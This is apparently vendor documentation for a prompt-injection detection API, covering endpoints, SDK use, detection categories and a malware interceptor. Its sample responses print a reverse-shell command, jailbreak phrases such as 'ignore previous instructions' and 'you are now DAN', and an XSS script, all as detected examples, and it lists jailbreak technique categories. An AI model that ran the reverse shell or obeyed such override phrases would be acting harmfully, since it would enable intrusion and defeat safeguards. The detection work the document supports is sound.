Complete documentation
Integration guides, API references, and tutorials for all ADLIBO products.
Adlibo Guard
Complete AI security platform
Prompt Guard
Prompt injection detection
DataShield
DLP tokenization for LLMs
Hallucination Guard
AI response verification
Senseway
LLM gateway, 50+ models
AI Threat Feed
IP blocklist for firewalls
AI Red Team
LLM/chatbot pentesting
Sovereignty Audit
IT sovereignty audit
ValPN
Sovereign Swiss VPN
SDKs
JavaScript, Python, PHP
On-Premise
Air-gapped deployment
Downloads
VM images, probes, SDKs
Quickstart Guide
Get started with Adlibo in less than 5 minutes. Protect your AI application from prompt injection attacks.
1. Get your API key
Create an account and generate your API key from the dashboard.
2. Install the SDK
npm install @adlibo/sdk
3. Analyze user input
import { Adlibo } from '@adlibo/sdk';
// Initialize with your API key (string, not object!)
const adlibo = new Adlibo('YOUR_API_KEY');
// Or with optional config:
// const adlibo = new Adlibo('YOUR_API_KEY', { timeout: 5000 });
// Analyze user input before sending to LLM
const result = await adlibo.analyze(userInput);
if (result.safe) {
// Safe to process
const response = await openai.chat.completions.create({
messages: [{ role: 'user', content: userInput }],
model: 'gpt-4'
});
} else {
// Block malicious input
console.log(`Blocked: ${result.category}`);
console.log(`Risk Score: ${result.riskScore}`);
}

Note: ESM vs CommonJS
The SDK is published in ESM format. If you use CommonJS ("type": "commonjs" in package.json), use dynamic import:
// CommonJS (.cjs, or no "type": "module" in package.json)
async function init() {
const { Adlibo } = await import('@adlibo/sdk');
const adlibo = new Adlibo('YOUR_API_KEY');
return adlibo;
}
// Usage
const adlibo = await init();
const result = await adlibo.analyze(userInput);

Parallel Integration
If you already have an existing protection system, you can use Adlibo as a complement to centralize your logs and benefit from our dashboard.
Two integration modes
- Full mode: Adlibo detects and protects (Quickstart)
- Parallel mode: Your code detects, Adlibo centralizes logs
Parallel architecture
User
│
▼
┌─────────────────┐
│ Your protection │ ◄── Local detection (your code)
│     system      │
└────────┬────────┘
│
▼ (on detection)
┌─────────────────┐
│   Adlibo API    │ ◄── POST /v1/report
│  (centralizes)  │
└────────┬────────┘
│
▼
┌─────────────────┐
│     Unified     │
│    dashboard    │
└─────────────────┘

Report a detection
// Your own system performs the local detection
const myDetectionResult = myLocalDetector.analyze(userInput);
// Send it to Adlibo to centralize the logs
if (!myDetectionResult.safe) {
await fetch('https://www.adlibo.com/api/v1/report', {
method: 'POST',
headers: {
'Authorization': 'Bearer YOUR_API_KEY',
'Content-Type': 'application/json'
},
body: JSON.stringify({
détection: {
riskScore: myDetectionResult.score,
severity: myDetectionResult.level, // 'LOW' | 'MEDIUM' | 'HIGH' | 'CRITICAL'
categories: myDetectionResult.types,
patterns: myDetectionResult.matches,
action: 'BLOCKED',
blocked: true,
inputLength: userInput.length,
inputPreview: userInput.slice(0, 200),
userId: currentUser?.id,
endpoint: '/api/chat',
clientEngine: 'my-detector-v1.0'
}
})
});
}

Batch mode (up to 100 detections)
// Send several detections at once
await fetch('https://www.adlibo.com/api/v1/report', {
method: 'POST',
headers: {
'Authorization': 'Bearer YOUR_API_KEY',
'Content-Type': 'application/json'
},
body: JSON.stringify({
batch: [
{ riskScore: 85, severity: 'HIGH', ... },
{ riskScore: 92, severity: 'CRITICAL', ... },
// up to 100 detections
]
})
});

Authentication
All API requests require authentication via a Bearer token in the Authorization header.
Authorization: Bearer YOUR_API_KEY

Keep your API key secure
Never expose your API key in client-side code. Always make API calls from your backend server.
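A minimal sketch of that pattern, assuming a Node 18+ backend (built-in fetch). The `/api/guard` route, the `buildAnalyzeRequest` helper, and the exact analyze URL are illustrative names, not part of the official SDK:

```javascript
// Illustrative backend proxy: the browser calls YOUR server,
// and only the server holds the API key (from an environment variable).
// Endpoint URL assumed by analogy with /v1/report in these docs.
const ADLIBO_URL = 'https://www.adlibo.com/api/v1/analyze';

// Build the server-side request so the key never reaches the client.
function buildAnalyzeRequest(text, apiKey) {
  return {
    method: 'POST',
    headers: {
      'Authorization': `Bearer ${apiKey}`,
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({ text })
  };
}

// Express-style handler sketch (e.g. app.post('/api/guard', handler)):
async function handler(req, res) {
  const r = await fetch(
    ADLIBO_URL,
    buildAnalyzeRequest(req.body.text, process.env.ADLIBO_API_KEY)
  );
  res.json(await r.json()); // forward the verdict, never the key
}
```

The client only ever sees the analysis verdict returned by your own route.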
/v1/analyze

Analyze text for prompt injection patterns. Returns detailed information about detected threats, risk score, and recommended action.
Request Body
| Parameter | Type | Description |
|---|---|---|
| text | string | Required. The text to analyze. |
| options.includeDetails | boolean | Include matched pattern details. Default: true |
| options.sanitize | boolean | Return sanitized text in response. Default: false |
| roleContext | object | Role-based access context for enhanced scoring. ENTERPRISE only. |
| roleContext.userRole | string | User role: EMPLOYEE, MANAGER, HR_MANAGER, EXECUTIVE, SUPER_ADMIN, etc. |
| roleContext.businessDomain | string | Business domain: HEALTHCARE, FINANCE, LEGAL, GOVERNMENT, etc. |
| roleContext.isOwnData | boolean | User accessing their own data (reduces sensitivity score). |
| roleContext.isTeamData | boolean | Manager accessing team data (reduces sensitivity score). |
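The parameters above can be assembled into a raw request body. This is a sketch: the field names come from the table, but `analyzeBody` and the specific role values chosen are illustrative:

```javascript
// Build a /v1/analyze request body with a roleContext (ENTERPRISE only).
// Example scenario: an HR manager in healthcare reading their team's data.
function analyzeBody(text) {
  return {
    text,
    options: { includeDetails: true, sanitize: false },
    roleContext: {
      userRole: 'HR_MANAGER',
      businessDomain: 'HEALTHCARE',
      isOwnData: false,
      isTeamData: true // manager accessing team data lowers sensitivity scoring
    }
  };
}

// Then send it with your usual authenticated POST, e.g.:
// await fetch('https://www.adlibo.com/api/v1/analyze', {
//   method: 'POST',
//   headers: { 'Authorization': 'Bearer YOUR_API_KEY', 'Content-Type': 'application/json' },
//   body: JSON.stringify(analyzeBody(userInput))
// });
```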
Response
{
"safe": false,
"riskScore": 92,
"severity": "CRITICAL",
"category": "INSTRUCTION_OVERRIDE",
"action": "BLOCK",
"patterns": [
{
"type": "DIRECT_OVERRIDE",
"match": "ignore previous instructions",
"score": 80,
"position": { "start": 0, "end": 28 }
},
{
"type": "DAN_JAILBREAK",
"match": "you are now DAN",
"score": 90,
"position": { "start": 30, "end": 45 }
}
],
"sanitizedText": null,
"processingTimeMs": 3
}

Example
import { Adlibo } from '@adlibo/sdk';
// Initialize with your API key (string, not object!)
const adlibo = new Adlibo('YOUR_API_KEY');
// Or with optional config:
// const adlibo = new Adlibo('YOUR_API_KEY', { timeout: 5000 });
// Analyze user input before sending to LLM
const result = await adlibo.analyze(userInput);
if (result.safe) {
// Safe to process
const response = await openai.chat.completions.create({
messages: [{ role: 'user', content: userInput }],
model: 'gpt-4'
});
} else {
// Block malicious input
console.log(`Blocked: ${result.category}`);
console.log(`Risk Score: ${result.riskScore}`);
}

/v1/sanitize

Remove or neutralize malicious patterns from text. Returns the cleaned text along with what was removed.
Response
{
"text": "User input without malicious content",
"removed": [
{
"type": "SCRIPT_INJECTION",
"original": "<script>alert('xss')</script>",
"position": { "start": 15, "end": 48 }
}
],
"wasModified": true,
"processingTimeMs": 2
}

Example
// Sanitize input (remove malicious patterns)
const cleaned = await adlibo.sanitize(userInput);
console.log(cleaned.text); // Safe text
console.log(cleaned.removed); // Patterns removed

/v1/detect

Fast boolean check for prompt injection. Use this endpoint when you only need a yes/no answer and want minimal latency.
Response
{
"safe": true,
"processingTimeMs": 1
}

Example
// Quick boolean check
const isSafe = await adlibo.detect(userInput);
if (!isSafe) {
throw new Error('Potentially malicious input detected');
}

/v1/report (Parallel integration)

Records a detection performed by your own system. Use this endpoint to centralize your logs in the Adlibo dashboard without modifying your existing detection logic.
Request Body
| Parameter | Type | Description |
|---|---|---|
| détection.riskScore | number | Required. Risk score (0-100) |
| détection.severity | string | Required. One of: LOW, MEDIUM, HIGH, CRITICAL |
| détection.action | string | Required. One of: LOGGED, WARNED, BLOCKED, ALERTED |
| détection.blocked | boolean | Required. Whether the request was blocked |
| détection.inputLength | number | Required. Length of the original text |
| détection.categories | string[] | Detected categories |
| détection.patterns | object[] | Matched patterns (category, match, score) |
| détection.inputPreview | string | First 200 characters (for debugging) |
| détection.clientEngine | string | Your detector version (e.g., "my-guard-v1.2") |
| batch | object[] | Or: array of detections (max 100) |
Response
{
"success": true,
"detectionId": "clxyz123...",
"processingTimeMs": 5
}
// Or, in batch mode:
{
"success": true,
"processed": 95,
"failed": 5,
"processingTimeMs": 120
}

Detection Patterns
Adlibo detects {patternCount} attack patterns across {categoryCount} categories, with a 100% detection rate* (*excluding 0-day attacks) and 23 ms P99 latency. Here are the main threat categories:
Direct Override
Attempts to override system instructions
Role Manipulation
Attempts to change AI persona or claim business roles
DAN Jailbreak
Do Anything Now and similar attacks
Instruction Extraction
Attempts to reveal system prompts
Token Manipulation
LLM-specific format tokens
Encoding/Obfuscation
Leetspeak, homoglyphs, spacing tricks
Roleplay Attack
Fictional scenarios to bypass safety
Emotional Manipulation
Social engineering via urgency, guilt, flattery
Gradual Boundary
Multi-turn attacks that build trust incrementally
Sensitive Query
Requests for sensitive data by domain
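To illustrate how an application might act on these categories, here is a hypothetical policy mapping. The category names follow the list above, but the chosen actions (`BLOCK`, `FLAG_FOR_REVIEW`, etc.) are application-side examples, not Adlibo API behavior:

```javascript
// Map a detected category to an application-side action (illustrative policy).
function policyFor(category) {
  switch (category) {
    case 'DIRECT_OVERRIDE':
    case 'DAN_JAILBREAK':
    case 'TOKEN_MANIPULATION':
      return 'BLOCK';             // hard attacks: reject outright
    case 'EMOTIONAL_MANIPULATION':
    case 'GRADUAL_BOUNDARY':
      return 'FLAG_FOR_REVIEW';   // multi-turn/social attacks: log and watch the session
    case 'SENSITIVE_QUERY':
      return 'REQUIRE_AUTH';      // sensitive data: re-check the user's role first
    default:
      return 'LOG';               // everything else: record only
  }
}
```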
Malware Interceptor
586+ patterns across 40 detection groups for malicious payloads hidden in user prompts. The Malware Interceptor identifies reverse shells, supply chain attacks (npm/pip), AI/LLM malware (pickle RCE, model poisoning), cloud-native attacks (AWS/Azure/GCP), macOS malware, phishing, Active Directory attacks, fileless techniques, IoT/firmware, mobile, container escape, deserialization RCE, crypto theft, email/SMTP abuse, and API weaponization before they reach your LLM.
Category
MALWARE_PAYLOAD
Category #24 of the Prompt Guard engine
Scoring
Score: 95 (CRITICAL)
alwaysBlock: true (blocked automatically)
Detected threat types
Reverse Shells
Supply Chain
AI/LLM Malware
Cloud-Native
macOS Malware
PowerShell + Fileless
AD Attacks
Phishing Infra
Ransomware
IoT/Firmware
Mobile Malware
Deserialization RCE
Container Escape
Crypto Theft
Email/SMTP
API Weaponization
Steganography
+15 other groups
API Integration
The Malware Interceptor is automatically included in the /v1/analyze, /v1/detect, and /v1/sanitize responses. No additional configuration is required.
// /v1/analyze response with a MALWARE_PAYLOAD detection
{
"safe": false,
"riskScore": 95,
"severity": "CRITICAL",
"category": "MALWARE_PAYLOAD",
"action": "BLOCK",
"patterns": [
{
"type": "MALWARE_PAYLOAD",
"match": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
"score": 95,
"position": { "start": 42, "end": 82 },
"subCategory": "reverse_shell"
}
],
"blocked": true,
"processingTimeMs": 2
}

Included in all Prompt Guard plans
The Malware Interceptor is enabled by default on all plans (Free, Pro, Business, Enterprise) at no extra cost. The 586+ patterns (40 groups) are continuously updated via the PTI (Prompt Threat Intelligence) system.
Security Assessment Agent
Deploy our CLI agent for comprehensive security audits. Non-destructive scans covering OWASP Top 10, API Security, and LLM vulnerabilities.
Installation
# Download the agent
curl -sSL https://www.adlibo.com/api/agent/download -o adlibo-agent.sh
chmod +x adlibo-agent.sh
# Check system compatibility
./adlibo-agent.sh --system-info
# Install dependencies (auto-detects distro)
./adlibo-agent.sh --install-deps

Usage
# Run all tests
./adlibo-agent.sh --token <YOUR_TOKEN> --all
# Interactive module selection
./adlibo-agent.sh --token <YOUR_TOKEN> --interactive
# Specific modules only
./adlibo-agent.sh --token <YOUR_TOKEN> -m owasp-a01,owasp-a03,llm-01
# List available modules
./adlibo-agent.sh --list

Available Modules
| Module | Description | Framework |
|---|---|---|
| owasp-a01 | Broken Access Control | OWASP Top 10 |
| owasp-a03 | Injection (SQL, XSS, Command) | OWASP Top 10 |
| api-1 | Broken Object Level Auth | OWASP API |
| llm-01 | Direct Prompt Injection | OWASP LLM |
| llm-02 | Indirect Prompt Injection | OWASP LLM |
| infra-ssl | SSL/TLS Configuration | Infrastructure |
| data-secrets | Secrets Detection | Data Exposure |
Rate Limits
| Plan | Tokens/Month | Rate Limit |
|---|---|---|
| Trial (14 days) | 5,000 | 60 req/min |
| Pro | 50,000 | 600 req/min |
| Enterprise | Unlimited | 10,000 req/min |
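To stay under the per-minute quota client-side, a simple sliding-window limiter can gate outgoing calls before they hit the API. This is a sketch, not an SDK feature; the class name and interface are illustrative:

```javascript
// Minimal sliding-window limiter for a req/min quota
// (e.g. new MinuteLimiter(60) for the Trial plan).
class MinuteLimiter {
  constructor(maxPerMinute) {
    this.max = maxPerMinute;
    this.stamps = []; // timestamps (ms) of requests in the last minute
  }

  // Returns true if a request may be sent now, false if the quota is full.
  tryAcquire(now = Date.now()) {
    const cutoff = now - 60_000;
    this.stamps = this.stamps.filter(t => t > cutoff); // drop expired entries
    if (this.stamps.length >= this.max) return false;
    this.stamps.push(now);
    return true;
  }
}
```

When `tryAcquire` returns false, queue the request or wait rather than sending it and burning a 429 against your quota.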
Error Codes
| Code | Description |
|---|---|
| 400 | Bad Request - Invalid parameters |
| 401 | Unauthorized - Invalid or missing API key |
| 403 | Forbidden - IP not allowed or quota exceeded |
| 429 | Too Many Requests - Rate limit exceeded |
| 500 | Internal Server Error |
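A sketch of client-side handling for these codes, retrying only on 429 with exponential backoff. `doRequest` stands in for your actual fetch call, and the helper name and retry parameters are illustrative:

```javascript
// Retry only rate-limit errors (429); fail fast on auth and quota errors.
async function callWithRetry(doRequest, maxRetries = 3, baseDelayMs = 1000) {
  for (let attempt = 0; attempt <= maxRetries; attempt++) {
    const res = await doRequest();
    if (res.status === 429 && attempt < maxRetries) {
      // Exponential backoff: baseDelayMs, 2x, 4x, ...
      await new Promise(r => setTimeout(r, 2 ** attempt * baseDelayMs));
      continue;
    }
    if (res.status === 401) throw new Error('Invalid or missing API key');
    if (res.status === 403) throw new Error('IP not allowed or quota exceeded');
    if (!res.ok) throw new Error(`Adlibo API error: ${res.status}`);
    return res;
  }
}
```

Usage: `const res = await callWithRetry(() => fetch(url, opts));`.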
Need Help?
Our team is here to help you integrate Adlibo into your application.